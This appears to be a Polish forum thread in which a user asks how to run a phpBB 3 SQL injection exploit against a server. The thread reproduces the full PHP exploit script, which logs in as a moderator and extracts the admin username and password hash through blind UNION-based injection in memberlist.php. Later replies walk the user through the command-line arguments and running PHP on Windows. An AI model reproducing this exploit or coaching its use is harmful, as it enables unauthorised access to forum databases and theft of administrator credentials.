PHPBB 3 exploit, problem

[NamelessSoldier]

Jak kompilowac spolity w php? I jeszcze nie wiem gdzie wstawic adres servera.
Wystarczy krasnal do tego?
Mam cos takiego:
http://www.milw0rm.com/exploits/2007

#!/usr/bin/php -q -d short_open_tag=on

<?

echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosuren";

echo "by rgod [email][email protected][/email]";

echo "site: http://retrogod.altervista.orgn";

echo "dork, version specific: "Powered by phpBB * 2002, 2006 phpBB Group"nn";



/*

works regardless of php.ini settings

you need a global moderator account with "simple moderator" role

*/



if ($argc<5) {

echo "Usage: php ".$argv[0]." host path user pass OPTIONSn";

echo "host:      target server (ip/hostname)n";

echo "path:      path to phpbb3n";

echo "user/pass: u need a valid user account with global moderator rightsn";

echo "Options:n";

echo "   -T[prefix]   specify a table prefix different from default (phpbb_)n";

echo "   -p[port]:    specify a port other than 80n";

echo "   -P[ip:port]: specify a proxyn";

echo "   -u[number]:  specify a user id other than 2 (admin)n";

echo "   -x:          disclose table prefix through error messagesn";

echo "Example:rn";

echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-urn";

echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7n";

die;

}



error_reporting(0);

ini_set("max_execution_time",0);

ini_set("default_socket_timeout",5);



function quick_dump($string)

{

  $result='';$exa='';$cont=0;

  for ($i=0; $i<=strlen($string)-1; $i++)

  {

   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))

   {$result.="  .";}

   else

   {$result.="  ".$string[$i];}

   if (strlen(dechex(ord($string[$i])))==2)

   {$exa.=" ".dechex(ord($string[$i]));}

   else

   {$exa.=" 0".dechex(ord($string[$i]));}

   $cont++;if ($cont==15) {$cont=0; $result.="rn"; $exa.="rn";}

  }

 return $exa."rn".$result;

}

$proxy_regex = '(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)';

function sendpacketii($packet)

{

  global $proxy, $host, $port, $html, $proxy_regex;

  if ($proxy=='') {

    $ock=fsockopen(gethostbyname($host),$port);

    if (!$ock) {

      echo 'No response from '.$host.':'.$port; die;

    }

  }

  else {

   $c = preg_match($proxy_regex,$proxy);

    if (!$c) {

      echo 'Not a valid proxy...';die;

    }

    $parts=explode(':',$proxy);

    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...rn";

    $ock=fsockopen($parts[0],$parts[1]);

    if (!$ock) {

      echo 'No response from proxy...';die;

   }

  }

  fputs($ock,$packet);

  if ($proxy=='') {

    $html='';

    while (!feof($ock)) {

      $html.=fgets($ock);

    }

  }

  else {

    $html='';

    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {

      $html.=fread($ock,1);

    }

  }

  fclose($ock);

  #debug

  #echo "rn".$html;

}



$host=$argv[1];

$path=$argv[2];

$user=$argv[3];

$pass=$argv[4];

$port=80;

$prefix="PHPBB_";

$user_id="2";//admin

$discl=0;

$proxy="";

for ($i=3; $i<=$argc-1; $i++){

$temp=$argv[$i][0].$argv[$i][1];

if ($temp=="-p")

{

  $port=str_replace("-p","",$argv[$i]);

}

if ($temp=="-P")

{

  $proxy=str_replace("-P","",$argv[$i]);

}

if ($temp=="-T")

{

  $prefix=str_replace("-T","",$argv[$i]);

}

if ($temp=="-u")

{

  $user_id=str_replace("-u","",$argv[$i]);

}

if ($temp=="-x")

{

  $discl=1;

}

}



if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}

if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}



$data="username=".urlencode($user);

$data.="&password=".urlencode($pass);

$data.="&redirect=index.php";

$data.="&login=Login";

$packet="POST ".$p."ucp.php?mode=login HTTP/1.0rn";

$packet.="Referer: http://$host$path/ucp.php?mode=loginrn";

$packet.="Content-Type: application/x-www-form-urlencodedrn";

$packet.="Accept-Encoding: text/plainrn";

$packet.="Host: ".$host."rn";

$packet.="Content-Length: ".strlen($data)."rn";

$packet.="Connection: Closernrn";

$packet.=$data;

sendpacketii($packet);

$cookie="";

$temp=explode("Set-Cookie: ",$html);

for ($i=1; $i<=count($temp)-1; $i++)

{

 $temp2=explode(" ",$temp[$i]);

 $cookie.=" ".$temp2[0];

}

if (eregi("_u=1;",$cookie))

{

//echo $html."n";//debug

//die("Unable to login...");

}

echo "cookie -> ".$cookie."rn";

if ($discl)

{

$sql="'suntzuuuuu";

echo "sql -> ".$sql."n";

$sql=urlencode(strtoupper($sql));

$data="username=";

$data.="&icq=";

$data.="&email=";

$data.="&aim=";

$data.="&joined_select=lt";

$data.="&joined=";

$data.="&yahoo=";

$data.="&active_select=lt";

$data.="&active=";

$data.="&msn=";

$data.="&count_select=eq";

$data.="&count=";

$data.="&jabber=";

$data.="&sk=c";

$data.="&sd=a";

$data.="&ip=".$sql;

$data.="&search_group_id=0";

$data.="&submit=Search";

$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0rn";

$packet.="Content-Type: application/x-www-form-urlencodedrn";

$packet.="Host: ".$host."rn";

$packet.="Content-Length: ".strlen($data)."rn";

$packet.="Connection: Closern";

$packet.="Cookie: ".$cookie." rnrn";

$packet.=$data;

sendpacketii($packet);

if (strstr($html,"You have an error in your SQL syntax"))

{

$temp=explode("posts",$html);

$temp2=explode(" ",$temp[0]);

$prefix=strtoupper($temp2[count($temp2)-1]);

echo "prefix -> ".$prefix."n";sleep(2);

}

}



$md5s[0]=0;//null

$md5s=array_merge($md5s,range(48,57)); //numbers

$md5s=array_merge($md5s,range(97,102));//a-f letters

//print_r(array_values($md5s));

$j=1;$password="";

while (!strstr($password,chr(0)))

{

for ($i=0; $i<=255; $i++)

{

if (in_array($i,$md5s))

{

  $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";

  echo "sql -> ".$sql."n";

  $sql=urlencode(strtoupper($sql));

  $data="username=";

  $data.="&icq=";

  $data.="&email=";

  $data.="&aim=";

  $data.="&joined_select=lt";

  $data.="&joined=";

  $data.="&yahoo=";

  $data.="&active_select=lt";

  $data.="&active=";

  $data.="&msn=";

  $data.="&count_select=eq";

  $data.="&count=";

  $data.="&jabber=";

  $data.="&sk=c";

  $data.="&sd=a";

  $data.="&ip=".$sql;

  $data.="&search_group_id=0";

  $data.="&submit=Search";

  $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0rn";

  $packet.="Content-Type: application/x-www-form-urlencodedrn";

  $packet.="Host: ".$host."rn";

  $packet.="Content-Length: ".strlen($data)."rn";

  $packet.="Connection: Closern";

  $packet.="Cookie: ".$cookie." rnrn";

  $packet.=$data;

  sendpacketii($packet);

  if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]rn";sleep(2);break;}

  }

  if ($i==255) {die("Exploit failed...");}

}

$j++;

}



$j=1;$admin="";

while (!strstr($admin,chr(0)))

{

for ($i=0; $i<=255; $i++)

{

  $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";

  echo "sql -> ".$sql."n";

  $sql=urlencode(strtoupper($sql));

  $data="username=";

  $data.="&icq=";

  $data.="&email=";

  $data.="&aim=";

  $data.="&joined_select=lt";

  $data.="&joined=";

  $data.="&yahoo=";

  $data.="&active_select=lt";

  $data.="&active=";

  $data.="&msn=";

  $data.="&count_select=eq";

  $data.="&count=";

  $data.="&jabber=";

  $data.="&sk=c";

  $data.="&sd=a";

  $data.="&ip=".$sql;

  $data.="&search_group_id=0";

  $data.="&submit=Search";

  $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0rn";

  $packet.="Content-Type: application/x-www-form-urlencodedrn";

  $packet.="Host: ".$host."rn";

  $packet.="Content-Length: ".strlen($data)."rn";

  $packet.="Connection: Closern";

  $packet.="Cookie: ".$cookie." rnrn";

  $packet.=$data;

  sendpacketii($packet);

  if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]rn";sleep(2);break;}

  }

  if ($i==255) {die("Exploit failed...");}

$j++;

}

echo "--------------------------------------------------------------------rn";

echo "admin          -> ".$admin."rn";

echo "password (md5) -> ".$password."rn";

echo "--------------------------------------------------------------------rn";



function is_hash($hash)

{

 if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}

 else {return false;}

}



if (is_hash($password)) {echo "Exploit succeeded...";}

else {echo "Exploit failed...";}

?>



# milw0rm.com [2006-07-13]

 

[HeadShot]

echo "Usage: php ".$argv[0]." host path user pass OPTIONSn";

echo "host:      target server (ip/hostname)n";

echo "path:      path to phpbb3n";

echo "user/pass: u need a valid user account with global moderator rightsn";

echo "Options:n";

echo "   -T[prefix]   specify a table prefix different from default (phpbb_)n";

echo "   -p[port]:    specify a port other than 80n";

echo "   -P[ip:port]: specify a proxyn";

echo "   -u[number]:  specify a user id other than 2 (admin)n";

echo "   -x:          disclose table prefix through error messagesn";

Tu jest wszystko, wystarczy pozmieniac to i owo.

 

[NamelessSoldier]

Tak, tylko co pozmieniac? TO jest tylko wyswietlanie tekstu. Jakies parametry, tylko gdzie je wpisac? Moze napisz jakis przyklad (www.serwer.pl)?

 

[won..r]

Dobry boże, naucz się czytać to nie jest trudne opcje masz opisane, pff masz nawet przykład podany:

echo "Example:rn";

echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-urn";

echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7n";

Nie wiem czy mam ci podawać dokładnie wszystkie opcje co znacza domysl sie (o ile umiesz czytać):

echo "host:      target server (ip/hostname)n"; 

echo "path:      path to phpbb3n"; 

echo "user/pass: u need a valid user account with global moderator rightsn"; 

echo "Options:n";

btw: wrazie problemow pisz
faktycznie tu masz wypisywanie sie uczylo php oo i mam nawet w czym to bylo kompilowane

php -q -d short_open_tag=on

po twojej odpowiedzi rozumiem, że używasz windowsa i krasnala o tu może być już problem uzywasz krasnala wiec sparawa jest o tyle latwa ze php masz domyslnie w katalogu C:usrphp. Łopatologicznie mozesz tam skopiowac plik ze zrodlem i go skompilowac u mnie wygladalo to tak:

C:usrphp>php nowy.txt

Content-type: text/html

X-Powered-By: PHP/4.3.9



PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosur

e

by rgod [email][email protected][/email]

site: [url]http://retrogod.altervista.org[/url]

dork, version specific: "Powered by phpBB * 2002, 2006 phpBB Group"



Usage: php nowy.txt host path user pass OPTIONS

host:      target server (ip/hostname)

path:      path to phpbb3

user/pass: u need a valid user account with global moderator rights

Options:

   -T[prefix]   specify a table prefix different from default (phpbb_)

   -p[port]:    specify a port other than 80

   -P[ip:port]: specify a proxy

   -u[number]:  specify a user id other than 2 (admin)

   -x:          disclose table prefix through error messages

Example:

php nowy.txt localhost /phpbb3/ rgod suntzu-u-u

php nowy.txt localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7

a jeśli z ciebie wygodnić to dodaj sobie tą scieżke c:/[...] do zmiennej środowiskowej i git mozesz kompilować z jakiego katalogu tylko chcesz.

Tak przy okazji próbujesz hakować a kodu nie przeczytasz...

 

[NamelessSoldier]

Wlasnie czytalem. i to co Head Shot napisal mi nic nie dalo. Bo przyznam ze nie wiedzialem ze mozna kompilowac php. I nie wiedzialem jak to robic. ale dzieki za pomoc!

 

[won..r]

Spoko, w końcu czlowiek Óczy się przez cale życie. Ale mimo wszystko - wszystko jest napisane na poczatku tego exploita. Ale cieszę się że moglem pomóc